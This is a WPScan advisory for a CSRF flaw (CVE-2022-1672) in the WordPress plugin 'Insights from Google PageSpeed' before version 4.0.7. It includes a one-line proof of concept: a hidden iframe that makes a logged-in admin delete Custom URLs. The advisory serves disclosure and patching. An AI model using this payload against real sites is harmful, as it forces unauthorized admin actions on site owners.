WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Insights from Google PageSpeed < 4.0.7 - Multiple CSRF

Description

The plugin does not verify for CSRF before doing various actions such as deleting Custom URLs, which could allow attackers to make a logged in admin perform such actions via CSRF attacks

Proof of Concept

<iframe src="https://example.com/wp-admin/tools.php?page=google-pagespeed-insights&render=custom-urls&action=delete&page_id=1" width="0" height="0" frameborder="0"></iframe>

Affects Plugins

google-pagespeed-insights
Fixed in version 4.0.7

References

CVE
CVE-2022-1672

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
5c5955d7-24f0-45e6-9c27-78ef50446dad

Timeline

Publicly Published

2022-06-27 (about 9 months ago)

Added

2022-06-27 (about 9 months ago)

Last Updated

2022-06-27 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin